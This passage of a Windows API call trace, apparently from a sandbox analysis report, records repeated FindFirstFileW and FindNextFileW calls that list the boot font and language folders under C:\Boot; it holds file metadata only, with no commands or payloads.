ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0093.341] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0093.341] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0093.341] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0093.341] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0 [0093.341] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.341] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.341] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.341] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0093.342] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0x0, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1 [0093.342] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0x0, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1 [0093.342] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0x0, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1 [0093.342] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0x0, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1 [0093.342] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.342] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.342] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.343] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.343] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.343] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.343] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.343] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.343] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.343] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.343] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.343] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.344] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.344] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.344] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.344] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.344] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.344] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.344] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.344] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe817e7d8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.344] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.344] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.344] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.345] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.345] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.345] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.346] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.346] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.346] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.346] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.346] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.346] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.346] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.346] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.346] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.346] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0093.346] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.347] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x6ee8e4 | out: lpFindFileData=0x6ee8e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.347] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0093.347] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0093.347] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8f8 | out: lpFindFileData=0x6ee8f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0093.347] FindClose (in: hFindFile=0xb440e8 | out: hFindFile=0xb440e8) returned 1 [0093.347] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x6ee8a4 | out: lpFindFileData=0x6ee8a4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb440e8 [0093.348] FindNextFileW (in: hFindFile=0xb440e8, lpFindFileData=0x6ee8b8 | out: lpFindFileData=0x6ee8b8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, 